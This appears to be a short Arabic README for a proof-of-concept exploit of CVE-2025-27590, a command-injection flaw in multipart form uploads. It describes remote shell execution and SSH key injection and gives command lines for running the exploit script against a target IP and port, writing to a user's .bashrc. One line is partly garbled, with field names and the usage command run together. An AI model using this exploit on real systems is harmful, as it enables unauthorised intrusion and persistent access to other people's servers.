
إثبات مفهوم استغلال لثغرة CVE-2025-27590، وهي ثغرة حقن أوامر في تحميلات النماذج متعددة الأجزاء تتيح تنفيذ القشرة عن بُعد وحقن مفاتيح SSH.
هذا استغلال لإثبات المفهوم (PoC) لـ CVE-2025-27590، وهي ثغرة حقن أوامر تؤثر على تطبيقات الويب التي تعالج رفع الملفات متعددة الأجزاء (multipart) دون تنقية مناسبة. تسمح الثغرة للمهاجمين عن بُعد بتنفيذ أوامر شل عشوائية عبر صياغة حمولات بيانات نماذج خبيثة.
multipart/form-datacloginrc و file1python3 exploit_cve_2025_27590.py -u <TARGET_IP_OR_DOMAIN> -p -l <PATH_TO_WRITE>
python3 exploit_cve_2025_27590.py -u 172.20.221.195 -p 8888 -l /home/oxidized/.bashrc